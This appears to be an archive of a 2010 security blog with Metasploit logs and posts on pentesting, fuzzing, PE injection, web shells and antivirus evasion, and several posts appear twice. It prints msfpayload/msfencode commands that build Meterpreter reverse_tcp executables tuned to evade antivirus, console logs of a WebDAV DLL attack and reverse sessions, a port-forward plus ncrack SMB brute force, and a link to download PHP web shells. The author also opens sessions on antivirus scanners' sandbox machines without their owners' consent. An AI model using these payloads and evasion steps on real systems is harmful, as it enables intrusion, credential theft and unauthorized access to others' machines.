[*] yyy.yyy.yyy.yyy:27482 OPTIONS /
[*] yyy.yyy.yyy.yyy:27482 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27482 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27482 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27482 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27482 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27482 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27482 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27482 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27482 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27482 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27482 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27482 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27482 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27482 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27482 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27485 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27485 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27485 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27485 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27485 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/desktop.ini
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 404 (/documents/desktop.ini)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27649 PROPFIND /documents/policy.p7c
[*] yyy.yyy.yyy.yyy:27649 PROPFIND => 207 File (/documents/policy.p7c)
[*] yyy.yyy.yyy.yyy:27650 PROPFIND /documents/wab32res.dll
[*] yyy.yyy.yyy.yyy:27650 PROPFIND => 207 File (/documents/wab32res.dll)
[*] yyy.yyy.yyy.yyy:27649 PROPFIND /DOCUMENTS
[*] yyy.yyy.yyy.yyy:27649 PROPFIND => 301 (/DOCUMENTS)
[*] yyy.yyy.yyy.yyy:27650 GET => DLL Payload
[*] yyy.yyy.yyy.yyy:27649 PROPFIND /DOCUMENTS/
[*] yyy.yyy.yyy.yyy:27649 PROPFIND => 207 Directory (/DOCUMENTS/)
[*] yyy.yyy.yyy.yyy:27649 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27650 PROPFIND /documents/rundll32.exe
[*] yyy.yyy.yyy.yyy:27650 PROPFIND => 404 (/documents/rundll32.exe)
[*] yyy.yyy.yyy.yyy:27652 PROPFIND /DOCUMENTS
[*] yyy.yyy.yyy.yyy:27652 PROPFIND => 301 (/DOCUMENTS)
[*] yyy.yyy.yyy.yyy:27650 PROPFIND /DOCUMENTS/
[*] yyy.yyy.yyy.yyy:27650 PROPFIND => 207 Directory (/DOCUMENTS/)
[*] yyy.yyy.yyy.yyy:27650 PROPFIND => 207 Top-Level Directory
[*] Sending stage (748544 bytes) to yyy.yyy.yyy.yyy
[*] yyy.yyy.yyy.yyy:27652 PROPFIND /documents/rsaenh.dll
[*] yyy.yyy.yyy.yyy:27652 PROPFIND => 207 File (/documents/rsaenh.dll)
[*] yyy.yyy.yyy.yyy:27652 GET => DLL Payload
[*] yyy.yyy.yyy.yyy:27656 PROPFIND /DOCUMENTS
[*] yyy.yyy.yyy.yyy:27656 PROPFIND => 301 (/DOCUMENTS)
[*] yyy.yyy.yyy.yyy:27652 PROPFIND /DOCUMENTS/
[*] yyy.yyy.yyy.yyy:27652 PROPFIND => 207 Directory (/DOCUMENTS/)
[*] yyy.yyy.yyy.yyy:27652 PROPFIND => 207 Top-Level Directory
[*] Meterpreter session 1 opened (xxx.xxx.xxx.xxx:4444 -> yyy.yyy.yyy.yyy:27654) at Tue Aug 24 11:38:57 +0300 2010
And here we have a nice meterpreter session.
Next, installing programs on the target system to identify more products that are vulnerable.
Tuesday, July 6, 2010
Metasploit and Ncrack
For some days now i'm working in a case for a client, a pentest project. The story goes like that, there is a server and the price is to get access to that server. The system is a running a control panel to allow clients easy configuration on their domains. As usual there is nothing given except the ip of the server and the papers to sign. From there you are on your own. So where to start.
Only with the IP i couldn't see much on the system just the default page and nothing else, portscan shows some ports open nothing to attack directly or with known vulnerabilities then it occurred to me, this panel by default, is replying on reverse DNS with the full list of the domains that is supporting. So a nslookup IP IP did the trick and i had a list of the domains on the system. I started slowly to browse around the domains looking for outdated applications and other details, one point of entry. It didn't take long to find a misconfigured application that allowed file upload. My first choice was to use the meterpreter from metasploit to initiate a reverse connection ( everything running through a php shell ), it didn't took me long to realize then that the system was firewalled in almost every port. Second choice ahead, meterpreter on reverse https port ! And that did the trick, i had connection.
Almost ready to close the case and write a report to the client, being confident and all, that it's just 2 lines from now to get full access on the system i typed on the console,
meterpreter > use priv
Loading extension priv...success.
meterpreter >
Followed by the getsystem command where i was greeted with the following not so happy for me message,
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: 5
meterpreter >
I got the same or similar error message for all methods and even for the latest method, brand new shinny KiTrap0D that to my surprise it didn't work. Most of the time these servers are not often rebooted ( patched from windows updates ) in order to maintain high uptime on the websites that they are serving.
Not giving up yet, there is always the motto, "Brute force, when you are not succeeding, you are not using enough". The first option was to brute force on the ftp server for accounts, but i already know that this panel is not allowing the administrator account to login through the ftp, and this account is the only one that i want to find out. I could go for remote desktop brute force but then it will take time, the whole process is very slow on rdp,and then i came across a very good network cracker, ncrack if only i could use it on the system that has the 445 port firewalled...
And here comes again the metasploit,
meterpreter >
portfwd add -l 445 -p 445 -r IP
meterpreter >
The port 445 was forwarded to my system, free from the firewall at last. Time for ncrack to take place.
./ncrack -vv -U users.txt localhost:445
and after a few minutes, the first results
Discovered credentials on smb://127.0.0.1:445 'user1' 'abcdef123'
Discovered credentials on smb://127.0.0.1:445 'user2' 'abcdef123'
Discovered credentials on smb://127.0.0.1:445 'user3' 'abcdef123'
Discovered credentials on smb://127.0.0.1:445 'user4' 'abcdef123'
It took almost three hours and 20 minutes to find the administrator password, but finally i had it!
Only with the IP i couldn't see much on the system just the default page and nothing else, portscan shows some ports open nothing to attack directly or with known vulnerabilities then it occurred to me, this panel by default, is replying on reverse DNS with the full list of the domains that is supporting. So a nslookup IP IP did the trick and i had a list of the domains on the system. I started slowly to browse around the domains looking for outdated applications and other details, one point of entry. It didn't take long to find a misconfigured application that allowed file upload. My first choice was to use the meterpreter from metasploit to initiate a reverse connection ( everything running through a php shell ), it didn't took me long to realize then that the system was firewalled in almost every port. Second choice ahead, meterpreter on reverse https port ! And that did the trick, i had connection.
Almost ready to close the case and write a report to the client, being confident and all, that it's just 2 lines from now to get full access on the system i typed on the console,
meterpreter > use priv
Loading extension priv...success.
meterpreter >
Followed by the getsystem command where i was greeted with the following not so happy for me message,
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: 5
meterpreter >
I got the same or similar error message for all methods and even for the latest method, brand new shinny KiTrap0D that to my surprise it didn't work. Most of the time these servers are not often rebooted ( patched from windows updates ) in order to maintain high uptime on the websites that they are serving.
Not giving up yet, there is always the motto, "Brute force, when you are not succeeding, you are not using enough". The first option was to brute force on the ftp server for accounts, but i already know that this panel is not allowing the administrator account to login through the ftp, and this account is the only one that i want to find out. I could go for remote desktop brute force but then it will take time, the whole process is very slow on rdp,and then i came across a very good network cracker, ncrack if only i could use it on the system that has the 445 port firewalled...
And here comes again the metasploit,
meterpreter >
portfwd add -l 445 -p 445 -r IP
meterpreter >
The port 445 was forwarded to my system, free from the firewall at last. Time for ncrack to take place.
./ncrack -vv -U users.txt localhost:445
and after a few minutes, the first results
Discovered credentials on smb://127.0.0.1:445 'user1' 'abcdef123'
Discovered credentials on smb://127.0.0.1:445 'user2' 'abcdef123'
Discovered credentials on smb://127.0.0.1:445 'user3' 'abcdef123'
Discovered credentials on smb://127.0.0.1:445 'user4' 'abcdef123'
It took almost three hours and 20 minutes to find the administrator password, but finally i had it!
Tuesday, June 22, 2010
Fuzzers and fuzzing
It's been a while now i was trying to time to test some fuzzers. Fuzzing as it is defined in Microsoft's SDL (Security Development Lifecycle):
"Fuzzing is a testing technique that can help find denial of service and security vulnerabilities in software. The principle of fuzzing is very simple: create invalid data, force an application to consume that malformed data, and then observe the application as it executes. If the application crashes, then a bug may have been found in the target application. By identifying this crash, you are able to quickly target potential problems in the underlying code and determine if changes are needed to fix the crash (and any related potential security issues) from affecting your users."
Microsoft is providing minifuzz for free (http://www.microsoft.com/downloads/details.aspx?displaylang=en&familyid=b2307ca4-638f-4641-9946-dc0a5abe8513) and was the first choice of the day.
After installing minifuzz and running it we get the following screen:
There are two options that we really have to insert here, the rest can stay on the default. The options that we need are, the process to fuzz and the location of the Template files. Template files are files that we will provide at the application in order to test it. These files are the normal input files that the application should accept. For my case i choose to try Easy RM to MP3 Converter an older version that it's known for the vulnerabilities ( http://www.corelan.be:8800/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/ )
Here is the fuzzer working
Quotting again the SDL process from Microsoft,
Fuzzing, as an SDL requirement, requires a minimum of 100,000 malformed files per file parser. So if your application parses three discrete file formats, .FOO files and .BAR files, then you need to create and correctly parse (ie; not crash) 100,000 FOO files and 100,000 BAR files.
So be ready for long hours. In another post we will see other fuzzers with examples.
"Fuzzing is a testing technique that can help find denial of service and security vulnerabilities in software. The principle of fuzzing is very simple: create invalid data, force an application to consume that malformed data, and then observe the application as it executes. If the application crashes, then a bug may have been found in the target application. By identifying this crash, you are able to quickly target potential problems in the underlying code and determine if changes are needed to fix the crash (and any related potential security issues) from affecting your users."
Microsoft is providing minifuzz for free (http://www.microsoft.com/downloads/details.aspx?displaylang=en&familyid=b2307ca4-638f-4641-9946-dc0a5abe8513) and was the first choice of the day.
After installing minifuzz and running it we get the following screen:
There are two options that we really have to insert here, the rest can stay on the default. The options that we need are, the process to fuzz and the location of the Template files. Template files are files that we will provide at the application in order to test it. These files are the normal input files that the application should accept. For my case i choose to try Easy RM to MP3 Converter an older version that it's known for the vulnerabilities ( http://www.corelan.be:8800/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/ )
Here is the fuzzer working
Quotting again the SDL process from Microsoft,
Fuzzing, as an SDL requirement, requires a minimum of 100,000 malformed files per file parser. So if your application parses three discrete file formats, .FOO files and .BAR files, then you need to create and correctly parse (ie; not crash) 100,000 FOO files and 100,000 BAR files.
So be ready for long hours. In another post we will see other fuzzers with examples.
Thursday, June 3, 2010
Flood bots and others
Today i found a bot running in a client's server system. The bot is designed for flood mainly and as it state in its name "Enjoy FloodBot based on OverKill". The problem on the server was a website that had an sql injection point, from there the attackers were able to take control on the site and add files through the custom cms. The content of the bot consist mainly of executables to perform flood attacks.
Link for research follows.
Flood Bot
Link for research follows.
Flood Bot
Wednesday, April 21, 2010
PE code injection part 3
A very good post on http://www.x-n2o.com/clever-tricks-against-antiviruses/, clever tricks against antivirus. Inside the post there is a main topic, "No imports!". Even though it's not new concept it's very nice explained with code examples. The same is done from different commercial packers eg. Themida for a very long time now.
Tuesday, April 20, 2010
Windbg and malware
From the presentation of Mark Russinovich on malware cleaning, he pointed out a very nice way to clear possible kernel patches ( malware with rootkit behavior ) that are hijacking the system.
From the help file,
The !chkimg extension detects corruption in the images of executable files by comparing them to the copy on a symbol store or other file repository.
Using the command in the debugger with the following form we can observe the patches, or mismatched areas according to the symbols:
lkd> !chkimg -d nt
and clearing the patches from the system can be done easily with the following command:
lkd> !chkimg -f nt
More to come
From the help file,
The !chkimg extension detects corruption in the images of executable files by comparing them to the copy on a symbol store or other file repository.
Using the command in the debugger with the following form we can observe the patches, or mismatched areas according to the symbols:
lkd> !chkimg -d nt
and clearing the patches from the system can be done easily with the following command:
lkd> !chkimg -f nt
More to come
Friday, April 16, 2010
PE code injection part 2
Looking for code injection and trying to add sections on PE, i found a very nice work done by KOrUPt ( http://korupt.co.uk/?cat=6 ) he has already implement a very nice injector that you can download with the source code at http://korupt.co.uk/KInfect2.rar the only piece missing is a custom stub. His improved version is the kcrypter2 available in forums.
Friday, April 9, 2010
PE code injection
Trying for awhile now to achieve 0 detection from antivirus engines, i believe the only solution is to move to manual encryption of the exe file or use a commercial cryptor. The problem with most packers/cryptors/protectors is that they are already considered as suspicious from the avs and many of them have requirements on the code.
Muts in 2008 made a nice presentation with the title Bypassing Anti-virus in Windows Vista, or "Piss on your AV" ( http://www.offensive-security.com/videos/shmoocon-presentation-2008-video/piss-on-your-av.html ). The presentation is nice, but not detailed. Some things are omitted,and other things not explained in details. Muts is using the last section of the PE header to add his stub, this is very convenient since the last section is the only one that can be easily extended without affecting other sections. But this is not the case always. Many times you cannot extend the last section and what you really need is to add a section or extend one section in the middle of the PE header. This will be in the next post, going for 0 detection.
Muts in 2008 made a nice presentation with the title Bypassing Anti-virus in Windows Vista, or "Piss on your AV" ( http://www.offensive-security.com/videos/shmoocon-presentation-2008-video/piss-on-your-av.html ). The presentation is nice, but not detailed. Some things are omitted,and other things not explained in details. Muts is using the last section of the PE header to add his stub, this is very convenient since the last section is the only one that can be easily extended without affecting other sections. But this is not the case always. Many times you cannot extend the last section and what you really need is to add a section or extend one section in the middle of the PE header. This will be in the next post, going for 0 detection.
Wednesday, March 31, 2010
php shell scripts
I found today an interesting collection of php shellscripts feel free to give it a check if interested. There is also a nice collection from DK at http://michaeldaw.org/projects/web-backdoor-compilation.
Names,
120667kk.php.pjpeg
420532Shell.php.pjpeg
629788tryag.php
681985c99.php
951078biJ.php
c99.php
joomla.php
mm.php
Mohajer22-perl.pl
O0O.php
perl.pl
sql.php
style.php
sym4.php
Team SQL.php
TrYaG.php
update.php
Some are modified versions of c99.php some seem custom.
Link to download here.
Names,
120667kk.php.pjpeg
420532Shell.php.pjpeg
629788tryag.php
681985c99.php
951078biJ.php
c99.php
joomla.php
mm.php
Mohajer22-perl.pl
O0O.php
perl.pl
sql.php
style.php
sym4.php
Team SQL.php
TrYaG.php
update.php
Some are modified versions of c99.php some seem custom.
Link to download here.
Tuesday, March 30, 2010
metasploit vs virustotal part 2
I really wanted to see what was inside the analysis folder and have some better statistic results from the antivirus. At that time, metasploit integrated a patch from ( http://www.metasploit.com/redmine/issues/1244 ), so i gave it a try also.
Detection rates and examples follow below, all result rates are from virustotal:
( calc.exe is calculator from windows XP and -k is the new command on msfencode to bind two files together and execute both of them in a separate thread )
./msfpayload windows/meterpreter/reverse_tcp LHOST=hostA raw | ./msfencode -b '' -c 5 -e x86/call4_dword_xor -x calc.exe -k -t exe -o testcalc-new1.exe
Result: 14/42 (33.34%)
Immediately when i uploaded the file i got a connection in my multi/handler,
[*] Meterpreter session 2 opened (hostA:4444 -> xx.xx.xx.131:49874)
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 118784 fil Wed Mar 24 11:52:27 +0200 2010 58568023.exe
100777/rwxrwxrwx 0 fil Wed Jan 14 05:59:52 +0200 2009 AUTOEXEC.BAT
100666/rw-rw-rw- 0 fil Wed Jan 14 05:59:52 +0200 2009 CONFIG.SYS
40777/rwxrwxrwx 0 dir Thu Jan 15 08:30:08 +0200 2009 Documents and Settings
100444/r--r--r-- 0 fil Wed Jan 14 05:59:52 +0200 2009 IO.SYS
100444/r--r--r-- 0 fil Wed Jan 14 05:59:52 +0200 2009 MSDOS.SYS
100555/r-xr-xr-x 47564 fil Tue Feb 28 15:00:00 +0200 2006 NTDETECT.COM
40555/r-xr-xr-x 0 dir Thu Jan 15 09:00:53 +0200 2009 Program Files
40777/rwxrwxrwx 0 dir Wed Jan 14 06:26:09 +0200 2009 System Volume Information
40777/rwxrwxrwx 0 dir Thu Jan 15 10:29:19 +0200 2009 WINDOWS
100666/rw-rw-rw- 211 fil Wed Jan 14 05:40:14 +0200 2009 boot.ini
100666/rw-rw-rw- 267964416 fil Wed Mar 24 12:50:57 +0200 2010 hiberfil.sys
100444/r--r--r-- 250048 fil Wed Jan 14 16:59:55 +0200 2009 ntldr
100666/rw-rw-rw- 402653184 fil Wed Mar 24 12:50:57 +0200 2010 pagefile.sys
100777/rwxrwxrwx 469 fil Wed Mar 24 11:52:19 +0200 2010 start.bat
100777/rwxrwxrwx 332800 fil Wed Jun 11 08:09:08 +0300 2008 wget.exe
Too bad i didn't see the analysis folder that i was looking. The connection was dropped 2-3 seconds later i assume the whole connection is lasting 10 seconds and the VM machine from what it appears it's rebooted or disconnected.
Trying again,
./msfpayload windows/meterpreter/reverse_tcp LHOST=hostA raw | ./msfencode -b '' -c 5 -e x86/call4_dword_xor -x calc.exe -t exe -o testcalc-new.exe
Result: 8/42 (19.05%)
Same template, but without binding of the exe files it was not bad actually.
With different encoder,
./msfpayload windows/meterpreter/reverse_tcp LHOST=hostA raw | ./msfencode -b '' -c 5 -x calc.exe -t exe -o testcalc-newnaiNObind5.exe
Result: 6/42 (14.29%)
Adding binding,
./msfpayload windows/meterpreter/reverse_tcp LHOST=hostA raw | ./msfencode -b '' -c 5 -x calc.exe -k -t exe -o testcalc-newnai.exe
Shikata ga nai the default encoder, gave a result of Result: 12/42 (28.58%).
I got almost the same results increasing the encoding times to 15
./msfpayload windows/meterpreter/reverse_tcp LHOST=hostA raw | ./msfencode -b '' -c 15 -x calc.exe -k -t exe -o testcalc-newnai15.exe
Result: 13/42 (30.96%)
And last one using XOR encoder
./msfpayload windows/meterpreter/reverse_tcp LHOST=hostA raw |./msfencode -c 20 -e x86/call4_dword_xor -x calc.exe -t exe -o testcalc-xor20.exe
Result: 8/42 (19.05%)
Plain encoding of the payload gives a detection rate of 20/42 (47.62%) (Shikata ga nai)
From what i noticed binding the exe file raises the changes of detection, most of the times the antivirus that are detecting the executables are the same, Microsoft, Nod32, Symantec, Sophos and something called McAfee-GW-Edition that is detecting anything as virus even plain text and incomplete code.
I really didn't wanted to put metasploit code into virustotal but i haven't seen any actual tests and results anywhere. I did some tests on novirusthanks ( http://scanner.novirusthanks.org/) but the scanner is slow, the results are poor and there are half, 20 only, antivirus engines on the scanner.
That's all for now, i didn't manage to get the files that i wanted, i manage to get some results on detection and some information from the VM's that were connecting back every time that i was uploading a file. Files are available on request.
Detection rates and examples follow below, all result rates are from virustotal:
( calc.exe is calculator from windows XP and -k is the new command on msfencode to bind two files together and execute both of them in a separate thread )
./msfpayload windows/meterpreter/reverse_tcp LHOST=hostA raw | ./msfencode -b '' -c 5 -e x86/call4_dword_xor -x calc.exe -k -t exe -o testcalc-new1.exe
Result: 14/42 (33.34%)
Immediately when i uploaded the file i got a connection in my multi/handler,
[*] Meterpreter session 2 opened (hostA:4444 -> xx.xx.xx.131:49874)
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 118784 fil Wed Mar 24 11:52:27 +0200 2010 58568023.exe
100777/rwxrwxrwx 0 fil Wed Jan 14 05:59:52 +0200 2009 AUTOEXEC.BAT
100666/rw-rw-rw- 0 fil Wed Jan 14 05:59:52 +0200 2009 CONFIG.SYS
40777/rwxrwxrwx 0 dir Thu Jan 15 08:30:08 +0200 2009 Documents and Settings
100444/r--r--r-- 0 fil Wed Jan 14 05:59:52 +0200 2009 IO.SYS
100444/r--r--r-- 0 fil Wed Jan 14 05:59:52 +0200 2009 MSDOS.SYS
100555/r-xr-xr-x 47564 fil Tue Feb 28 15:00:00 +0200 2006 NTDETECT.COM
40555/r-xr-xr-x 0 dir Thu Jan 15 09:00:53 +0200 2009 Program Files
40777/rwxrwxrwx 0 dir Wed Jan 14 06:26:09 +0200 2009 System Volume Information
40777/rwxrwxrwx 0 dir Thu Jan 15 10:29:19 +0200 2009 WINDOWS
100666/rw-rw-rw- 211 fil Wed Jan 14 05:40:14 +0200 2009 boot.ini
100666/rw-rw-rw- 267964416 fil Wed Mar 24 12:50:57 +0200 2010 hiberfil.sys
100444/r--r--r-- 250048 fil Wed Jan 14 16:59:55 +0200 2009 ntldr
100666/rw-rw-rw- 402653184 fil Wed Mar 24 12:50:57 +0200 2010 pagefile.sys
100777/rwxrwxrwx 469 fil Wed Mar 24 11:52:19 +0200 2010 start.bat
100777/rwxrwxrwx 332800 fil Wed Jun 11 08:09:08 +0300 2008 wget.exe
Too bad i didn't see the analysis folder that i was looking. The connection was dropped 2-3 seconds later i assume the whole connection is lasting 10 seconds and the VM machine from what it appears it's rebooted or disconnected.
Trying again,
./msfpayload windows/meterpreter/reverse_tcp LHOST=hostA raw | ./msfencode -b '' -c 5 -e x86/call4_dword_xor -x calc.exe -t exe -o testcalc-new.exe
Result: 8/42 (19.05%)
Same template, but without binding of the exe files it was not bad actually.
With different encoder,
./msfpayload windows/meterpreter/reverse_tcp LHOST=hostA raw | ./msfencode -b '' -c 5 -x calc.exe -t exe -o testcalc-newnaiNObind5.exe
Result: 6/42 (14.29%)
Adding binding,
./msfpayload windows/meterpreter/reverse_tcp LHOST=hostA raw | ./msfencode -b '' -c 5 -x calc.exe -k -t exe -o testcalc-newnai.exe
Shikata ga nai the default encoder, gave a result of Result: 12/42 (28.58%).
I got almost the same results increasing the encoding times to 15
./msfpayload windows/meterpreter/reverse_tcp LHOST=hostA raw | ./msfencode -b '' -c 15 -x calc.exe -k -t exe -o testcalc-newnai15.exe
Result: 13/42 (30.96%)
And last one using XOR encoder
./msfpayload windows/meterpreter/reverse_tcp LHOST=hostA raw |./msfencode -c 20 -e x86/call4_dword_xor -x calc.exe -t exe -o testcalc-xor20.exe
Result: 8/42 (19.05%)
Plain encoding of the payload gives a detection rate of 20/42 (47.62%) (Shikata ga nai)
From what i noticed binding the exe file raises the changes of detection, most of the times the antivirus that are detecting the executables are the same, Microsoft, Nod32, Symantec, Sophos and something called McAfee-GW-Edition that is detecting anything as virus even plain text and incomplete code.
I really didn't wanted to put metasploit code into virustotal but i haven't seen any actual tests and results anywhere. I did some tests on novirusthanks ( http://scanner.novirusthanks.org/) but the scanner is slow, the results are poor and there are half, 20 only, antivirus engines on the scanner.
That's all for now, i didn't manage to get the files that i wanted, i manage to get some results on detection and some information from the VM's that were connecting back every time that i was uploading a file. Files are available on request.
metasploit vs virustotal
A few days back i saw a post (http://practicalexploitation.com/post/417194846/rob-could-you-cover-anti-virus-evasion-i-was-going ) on tactical exploitation from jeffhnet, asking for help on bypassing AVGs. Trying to do the same I've started with metasploit's meterpreter and the usual attempts to bypass AVG.
First attempt, got a high rate of red flags, on virustotal and novirusthanks, around 35% to 40%. The command that i had used were:
./msfpayload windows/meterpreter/reverse_tcp LHOST=myhost raw | ./msfencode -b '' -t exe -o test1.exe
I changed the encoder and i got some slightly better results with:
./msfpayload windows/meterpreter/reverse_tcp LHOST=myhost raw | ./msfencode -b '' -e x86/call4_dword_xor -t exe -o test2-0.exe
Finally i ended with
./msfpayload windows/meterpreter/reverse_tcp LHOST=myhost raw | ./msfencode -b '' -c 5 -e x86/call4_dword_xor -x msseces.exe -t exe -o test2-5-mss.exe
Msseces.exe is the Microsoft antivirus and i used it as template for the msfencode. It produced a nice big exe that was almost undetectable. Actually 3 hits in novirusthanks and Result: 5/41 (12.2%) on virustotal ( MD5...: ca904e0c8ac8ec6e34b85f5c1c9b36bb ) . Roughly good results the only thing that was bothering me was that the file is being detected by Microsoft NOD32 and Symantec, but i settle to give it another try the next day.
So i fired up today msfconsole and multi handler to be ready to test my exe files, as i was going to scramble them with some commercial packers/encryptors/protectors. As i was going through a list of protectors to start i saw a strange connection to my console
[*] Started reverse handler on myhost:4444
[*] Starting the payload handler...
[*] Sending stage (747008 bytes)
[*] Meterpreter session 1 opened (myhost:4444 -> 67.124.xx.xx:47364)
I did immediately an ls and i saw the following
meterpreter > ls
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 1048392 fil Fri Mar 05 13:39:03 +0200 2010 0B7BBu.exe
100777/rwxrwxrwx 0 fil Sat Oct 14 19:27:15 +0300 2006 AUTOEXEC.BAT
100666/rw-rw-rw- 0 fil Sat Oct 14 19:27:15 +0300 2006 CONFIG.SYS
40777/rwxrwxrwx 0 dir Sat Oct 14 19:44:53 +0300 2006 Documents and Settings
100444/r--r--r-- 0 fil Sat Oct 14 19:27:15 +0300 2006 IO.SYS
100444/r--r--r-- 0 fil Sat Oct 14 19:27:15 +0300 2006 MSDOS.SYS
100555/r-xr-xr-x 47564 fil Sat Oct 14 19:49:28 +0300 2006 NTDETECT.COM
40555/r-xr-xr-x 0 dir Tue Aug 12 00:54:21 +0300 2008 Program Files
40777/rwxrwxrwx 0 dir Tue Aug 12 00:12:52 +0300 2008 RECYCLER
40777/rwxrwxrwx 0 dir Wed Nov 22 00:13:02 +0200 2006 System Volume Information
40777/rwxrwxrwx 0 dir Tue Aug 12 00:54:27 +0300 2008 WINDOWS
100666/rw-rw-rw- 202 fil Wed Nov 22 00:15:27 +0200 2006 boot.ini
100444/r--r--r-- 250032 fil Sat Oct 14 19:49:28 +0300 2006 ntldr
100666/rw-rw-rw- 402653184 fil Fri Mar 05 13:38:03 +0200 2010 pagefile.sys
40777/rwxrwxrwx 0 dir Tue Aug 12 00:15:46 +0300 2008 temp
The 0B7BBu.exe was the same size as my file, and the process list:
meterpreter > ps
Process list
============
PID Name Arch User Path
--- ---- ---- ---- ----
0 [System Process]
4 System x86
420 smss.exe x86 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
684 csrss.exe x86 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
708 winlogon.exe x86 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
752 services.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
764 lsass.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
920 svchost.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
988 svchost.exe x86 C:\WINDOWS\system32\svchost.exe
1108 svchost.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
